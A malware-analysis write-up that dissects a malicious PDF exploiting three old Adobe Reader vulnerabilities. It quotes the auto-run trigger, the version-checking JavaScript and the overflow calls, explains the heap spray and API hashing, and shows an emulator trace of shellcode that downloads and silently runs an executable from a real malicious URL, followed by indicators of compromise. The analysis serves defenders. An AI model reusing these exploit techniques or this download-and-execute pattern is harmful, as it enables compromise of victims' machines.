Adobe PDF Exploit
In the malware landscape, PDF documents have long been one of the most popular attack vectors. Thanks to vulnerabilities in Adobe Reader and its plugins, a seemingly harmless file can become the entry point to compromise a system.
In this article, we will analyze a real malicious PDF that exploits different vulnerabilities depending on the version of the reader installed, and we’ll see how it integrates a very compact shellcode (104 bytes) to download and execute a remote payload.
Sample Identification and Initial Triage
The malicious file under analysis is a PDF version 1.3 with a size of just 17 KB. At first glance, it doesn’t include Flash objects or embedded multimedia, but we quickly identified several JavaScript streams hidden inside the document. These scripts are automatically triggered through the /OpenAction directive, ensuring that the malicious code executes as soon as the file is opened in Adobe Reader.
To fingerprint the sample, we calculated the following hashes:
- MD5: 9e4938009e8d3b06442b727e73a7958c
- SHA-1: 139ac50c3f7e2def20be4077a59941235e0098ff
- SHA-256: 0b3b3b22c8a6e3474150ea1cb8ab494413d3a641d475916114b8c4a94393f753
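The three digests above can be reproduced with Python's standard hashlib module. This is a minimal sketch, not the tooling used in the analysis; the function names hash_bytes and hash_file and the file name sample.pdf are assumptions made for illustration.

```python
import hashlib

ALGORITHMS = ("md5", "sha1", "sha256")

def hash_bytes(data: bytes) -> dict:
    """Return the hex digests of data for each algorithm in ALGORITHMS."""
    return {name: hashlib.new(name, data).hexdigest() for name in ALGORITHMS}

def hash_file(path: str, chunk_size: int = 65536) -> dict:
    """Hash a file in chunks so large samples never sit fully in memory."""
    digests = {name: hashlib.new(name) for name in ALGORITHMS}
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            for digest in digests.values():
                digest.update(chunk)
    return {name: digest.hexdigest() for name, digest in digests.items()}

if __name__ == "__main__":
    # "sample.pdf" is a hypothetical path to the file under analysis.
    for name, value in hash_file("sample.pdf").items():
        print(f"{name}: {value}")
```

Comparing the printed SHA-256 against the value listed above is a quick way to confirm that the copy being analyzed is the same sample.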
A check on VirusTotal showed a high detection rate across multiple AV engines, confirming that the document was already flagged as malicious.
The internal structure analysis using PDFStreamDumper revealed three suspicious JavaScript objects, clearly pointing to an intentional exploitation setup rather than a benign document.
Using the collected information, we can summarize the metadata extracted from the online sandbox:
Field | Value |
---|---|
MD5 | 9e4938009e8d3b06442b727e73a7958c |
SHA-1 | 139ac50c3f7e2def20be4077a59941235e0098ff |
SHA-256 | 0b3b3b22c8a6e3474150ea1cb8ab494413d3a641d475916114b8c4a94393f753 |
Vhash | 92ed1bde3b4201a28f31eb183acad4fc8 |
SSDEEP | 192:T0G2mJhASZy09x86Oly09x8Dvj5lRZly09x8SRZkjXmdfRZo5suB:THJPZy09x8Dly09x8/5hly09x8y1o5T |
TLSH | T198726952AF9813A598604DF52349361724F2DE2F28D9319AE6D11E73B03EB13ECE9374 |
File Type | PDF, document, pdf |
Magic | PDF document, version 1.3, 0 pages |
TrID | Adobe Portable Document Format (100 %) |
File Size | 17.06 KB (17,467 bytes) |
The file is identified as a PDF document, version 1.3, with a total size of 17,467 bytes. No Flash objects or multimedia traces were observed, other than the three JavaScript streams. The object structure clearly indicates the deliberate use of /OpenAction in the root object, designed to trigger malicious code execution as soon as the PDF is opened.
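A quick way to spot this kind of auto-executing script during triage is to count the relevant name tokens in the raw file. The sketch below is a simplified keyword counter under stated assumptions: the keyword list and the function name count_pdf_keywords are chosen for illustration, and names obfuscated with #xx hex escapes or hidden inside compressed streams are not handled.

```python
import re

# Name tokens that commonly indicate automatic actions or embedded script.
KEYWORDS = (b"/OpenAction", b"/AA", b"/JavaScript", b"/JS")

def count_pdf_keywords(data: bytes) -> dict:
    """Count occurrences of each keyword as a complete PDF name token."""
    counts = {}
    for keyword in KEYWORDS:
        # The lookahead stops /AA from matching a longer name such as /AAPL.
        pattern = re.compile(re.escape(keyword) + rb"(?![A-Za-z0-9])")
        counts[keyword.decode("ascii")] = len(pattern.findall(data))
    return counts

if __name__ == "__main__":
    sample = b"1 0 obj << /OpenAction << /JS (this.BXcfTYewQ()) /S /JavaScript >> >> endobj"
    print(count_pdf_keywords(sample))
```

A non-zero count for /OpenAction together with /JS or /JavaScript does not prove a file is malicious, but it is a reasonable cue to dump and inspect the streams.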
Execution Flow of the Malicious PDF
The execution of the malware inside the PDF can be divided into several stages:
Phase 1 – Automatic Trigger
When the PDF is opened, the viewer processes the following entry in object 1:
/OpenAction << /JS (this.BXcfTYewQ()) /S /JavaScript >>
This directive ensures that the function BXcfTYewQ() is immediately executed in the Adobe Reader context.
Phase 2 – Deobfuscation and Dynamic Definition
The actual definition of BXcfTYewQ is located in object 13, wrapped in two layers of eval and a large String.fromCharCode(...) block that reconstructs the full script at runtime.
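Rather than letting eval run, the String.fromCharCode(...) layer can be decoded statically. The following is a minimal sketch that assumes the arguments are plain decimal literals; the function name decode_fromcharcode is hypothetical, and a sample that uses arithmetic expressions or hex literals as arguments would need a fuller parser.

```python
import re

# Matches String.fromCharCode(...) calls whose arguments are decimal literals.
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)")

def decode_fromcharcode(js_source: str) -> list:
    """Return the decoded text of every String.fromCharCode(...) call found."""
    decoded = []
    for match in FROMCHARCODE_RE.finditer(js_source):
        codes = [int(tok) for tok in match.group(1).split(",") if tok.strip()]
        decoded.append("".join(chr(code) for code in codes))
    return decoded

if __name__ == "__main__":
    layer = "eval(String.fromCharCode(112, 100, 102, 95, 115, 116, 97, 114, 116, 40, 41, 59))"
    print(decode_fromcharcode(layer))
```

When the decoded text itself contains another eval layer, the same function can be applied again to the output.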
Once beautified with a tool like JS Beautifier, the code becomes more legible. We can then see that it dynamically defines:
- Auxiliary functions (util_printf, collab_email, collab_geticon, pdf_start).
- Shellcode injection via unescape() and preparation of a heap spray.
These functions contain the logic to exploit various Adobe Reader vulnerabilities (CVEs). The script ends by calling:
pdf_start();
Phase 3 – PDF Reader Version Detection
Inside pdf_start(), the script retrieves the version of Adobe Reader:
function pdf_start() {
    var version = app.viewerVersion.toString();
    version = version.replace(/\D/g, '');
    var varsion_array = new Array(version.charAt(0), version.charAt(1), version.charAt(2));
    if ((varsion_array[0] == 8) && (varsion_array[1] == 0) ||
        (varsion_array[1] == 1 && varsion_array[2] < 3)) {
        util_printf();
    }
    if ((varsion_array[0] < 8) ||
        (varsion_array[0] == 8 && varsion_array[1] < 2 && varsion_array[2] < 2)) {
        collab_email();
    }
    if ((varsion_array[0] < 9) ||
        (varsion_array[0] == 9 && varsion_array[1] < 1)) {
        collab_geticon();
    }
}
For example, version “8.1.1” is reduced to the digit string “811”, and its first three digits are then compared one by one, allowing the script to branch the attack depending on the environment.
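To see which branches fire for a given reader version, the checks in pdf_start() can be modeled outside the PDF. This is a sketch that mirrors the conditions as transcribed above, including JavaScript operator precedence (&& binds tighter than ||); the function names version_digits and exploits_for are hypothetical, and missing digits are treated as 0 because charAt() returns an empty string that compares as 0.

```python
import re

def version_digits(viewer_version: str) -> list:
    """Strip non-digits and return the first three digits as integers."""
    digits = re.sub(r"\D", "", viewer_version)
    # charAt() past the end yields "", which JavaScript compares as 0.
    return [int(digits[i]) if i < len(digits) else 0 for i in range(3)]

def exploits_for(viewer_version: str) -> list:
    """Return the exploit functions pdf_start() would call, in order."""
    v = version_digits(viewer_version)
    chosen = []
    if (v[0] == 8 and v[1] == 0) or (v[1] == 1 and v[2] < 3):
        chosen.append("util_printf")
    if v[0] < 8 or (v[0] == 8 and v[1] < 2 and v[2] < 2):
        chosen.append("collab_email")
    if v[0] < 9 or (v[0] == 9 and v[1] < 1):
        chosen.append("collab_geticon")
    return chosen

if __name__ == "__main__":
    for version in ("7.0.9", "8.1.1", "9.1.0", "9.3.0"):
        print(version, exploits_for(version))
```

Because the three checks are independent if statements, a version such as 8.1.1 reaches all three functions. With the conditions exactly as transcribed, the second clause of the first check does not test the major version, so a string such as "9.1.0" would still reach util_printf().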
Phase 4 – Selection of the Attack Vector
Depending on the detected version, the script triggers one or more of three exploits. Each check in pdf_start() is a separate if statement, so more than one can fire for the same reader:
Option A – util_printf() (CVE-2008-2992)
Applicable to versions 8.0.0–8.1.2.
A heap spray is prepared with 0x40000-byte blocks containing a NOP sled and the shellcode. The script then calls:
util.printf("%45000f", num);
This overflows the internal buffer of printf, redirecting execution into the sprayed shellcode (RCE).
Option B – collab_email() (CVE-2007-5659)
Intended as a fallback for versions older than 8.1.1.
It abuses:
collab.collectEmailInfo({ subj:"", msg:overflow });
The overflow occurs in the msg field, again redirecting execution to the same shellcode.
Option C – collab_geticon() (CVE-2009-0927)
Intended as a last resort if Adobe Reader is older than 9.1, in case the previous attempts fail.
The exploit is triggered with:
app.doc.Collab.getIcon(overflowString);
In some cases, this results in fingerprinting or a DoS condition in vulnerable readers.
Adobe Reader Version | Exploit Used | Expected Result |
---|---|---|
8.0.0 – 8.1.2 | util.printf() | Remote Code Execution |
< 8.1.1 | collab_email() | Remote Code Execution |
< 9.1 | collab_geticon() | Possible RCE / DoS |
≥ 9.1 | None | No effect |
Embedded Shellcode Analysis
The obfuscated JavaScript inside the PDF builds a heap spray that embeds the payload as sequences of %uXXXX. To extract it, we used a small Python script that:
- Reads the obfuscated JavaScript and finds all %uXXXX occurrences.
- For each XXXX, swaps the byte order (e.g., 0x1234 -> 34 12).
- Concatenates all results into a byte array.
- Saves the output into shellcode.bin.
As a result, we obtained a 104-byte binary.
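The extraction steps listed above can be sketched as follows. This is a reconstruction from the description, not the original script; the function name extract_shellcode and the input file name decoded.js are assumptions. Note that the pattern collects every %uXXXX token it finds, so in practice it should be run only on the string that holds the shellcode, not on the NOP-sled filler.

```python
import re
import struct

def extract_shellcode(js_source: str) -> bytes:
    """Convert every %uXXXX token into two bytes in little-endian order."""
    words = re.findall(r"%u([0-9a-fA-F]{4})", js_source)
    # unescape() stores each %uXXXX as a 16-bit unit, low byte first in memory.
    return b"".join(struct.pack("<H", int(word, 16)) for word in words)

if __name__ == "__main__":
    # "decoded.js" is a hypothetical file holding the deobfuscated script.
    with open("decoded.js", "r", encoding="utf-8", errors="replace") as fh:
        shellcode = extract_shellcode(fh.read())
    with open("shellcode.bin", "wb") as out:
        out.write(shellcode)
    print(f"wrote {len(shellcode)} bytes")
```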
Static Analysis in IDA
Loading shellcode.bin into IDA reveals a compact but fully functional flow:
- Dynamic API resolution – No direct imports; instead, the code walks the PEB to locate kernel32.dll and urlmon.dll, then computes function name hashes from the Export Table and compares them against precomputed values.
- Runtime string construction – Paths like %TEMP%\e.exe and the remote URL are assembled byte by byte using instructions such as stosb, stosw, and stosd.
- Download & execution logic – After resolving URLDownloadToFileA and WinExec, the shellcode downloads the payload and executes it with SW_HIDE, finally calling ExitThread(0).
Remarkably, the author fit all this functionality into only 104 bytes, implementing ROR13 hashing and avoiding static references to make AV detection more difficult.
PEB Walking and Function Hashing
The routine that resolves APIs begins by reading fs:[30h], the field of the Thread Environment Block (TEB) that holds the PEB address. From there:
- It accesses PEB->Ldr.InInitializationOrderModuleList to iterate loaded modules.
- For each entry (LDR_DATA_TABLE_ENTRY), it retrieves the module name (e.g., kernel32.dll). It walks the Export Directory, extracts each function name, and computes a rolling ROR13 hash, where ROR is a 32-bit rotate right:
hash = ROR(hash, 13) + character
Example of resolved hashes:
Function | Hash (hex) |
---|---|
GetTempPathA | 5B8ACA33 |
LoadLibraryA | EC0E4E8E |
URLDownloadToFileA | 702F1A36 |
WinExec | 0E8AFE98 |
ExitThread | 60E0CEEF |
- If the computed hash matches one hardcoded in the shellcode, the function pointer is retrieved.
This technique keeps the shellcode independent of absolute addresses and avoids visible import tables.
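The hashing step can be reproduced offline to label the constants found in the disassembly. The sketch below assumes the common additive ROR13 variant (rotate the 32-bit accumulator right by 13, then add the next character of the export name, without the terminating null); under that assumption it reproduces the WinExec value listed in the table. The function names ror32 and ror13_hash are chosen for illustration.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by count bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF

def ror13_hash(name: str) -> int:
    """Additive ROR13 hash over the ASCII bytes of an export name."""
    h = 0
    for ch in name.encode("ascii"):
        h = (ror32(h, 13) + ch) & 0xFFFFFFFF
    return h

if __name__ == "__main__":
    for api in ("GetTempPathA", "LoadLibraryA", "URLDownloadToFileA",
                "WinExec", "ExitThread"):
        print(f"{api:20s} {ror13_hash(api):08X}")
```

Hashing the export names of kernel32.dll and urlmon.dll this way and looking up the constants embedded in the shellcode is usually enough to name every resolved API without running the code.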
Controlled Execution with scDbg
To safely validate execution, we used scDbg with interactive hooks and memory monitoring. Running shellcode.bin at base address 0x401000 produced the following trace:
401086 GetTempPathA(len=88, buf=0x12fd80) = 25
4010B0 LoadLibraryA("urlmon.dll")
4010CA URLDownloadToFileA(
"http://juvitec.net/css/load.php?e=2",
"C:\\Users\\vboxuser\\AppData\\Local\\Temp\\e.exe",0,0)
4010D7 WinExec("C:\\Users\\vboxuser\\AppData\\Local\\Temp\\e.exe", SW_HIDE)
4010E0 ExitThread(0)
We also observed access to fs:[30h] and reads of the module list, confirming the same behavior described in the static analysis.
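For longer traces, the sequence of API calls can be pulled out programmatically. This is a small sketch that assumes the line layout shown above (a hexadecimal address, a space, then the API name and an opening parenthesis); the function name parse_trace is hypothetical, and other scDbg output modes may need a different pattern.

```python
import re

# An emulator trace line starts with a hex address followed by "Name(".
CALL_RE = re.compile(r"^([0-9A-Fa-f]{6,8})\s+(\w+)\(", re.MULTILINE)

def parse_trace(trace: str) -> list:
    """Return (address, api_name) tuples in the order they were called."""
    return [(int(addr, 16), api) for addr, api in CALL_RE.findall(trace)]

if __name__ == "__main__":
    trace = "\n".join([
        "401086 GetTempPathA(len=88, buf=0x12fd80) = 25",
        '4010B0 LoadLibraryA("urlmon.dll")',
        "4010CA URLDownloadToFileA(",
        '"http://juvitec.net/css/load.php?e=2",',
        "4010E0 ExitThread(0)",
    ])
    for address, api in parse_trace(trace):
        print(f"{address:#x} {api}")
```

Continuation lines that carry only arguments, such as the URL, do not start with an address and are skipped.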
Indicators of Compromise (IOCs)
During the analysis, several artifacts were identified that can serve as Indicators of Compromise (IOCs). These help blue teams and incident responders detect whether this exploit or its payload has been executed in their environment.
Type | Value |
---|---|
MD5 (PDF) | 9e4938009e8d3b06442b727e73a7958c |
SHA-1 (PDF) | 139ac50c3f7e2def20be4077a59941235e0098ff |
SHA-256 (PDF) | 0b3b3b22c8a6e3474150ea1cb8ab494413d3a641d475916114b8c4a94393f753 |
Malicious URL | hxxp://juvitec.net/css/load.php?e=2 |
Dropped File | %TEMP%\e.exe |
Exploit Techniques | CVE-2008-2992 (util.printf), CVE-2007-5659 (collab.collectEmailInfo), CVE-2009-0927 (collab.getIcon) |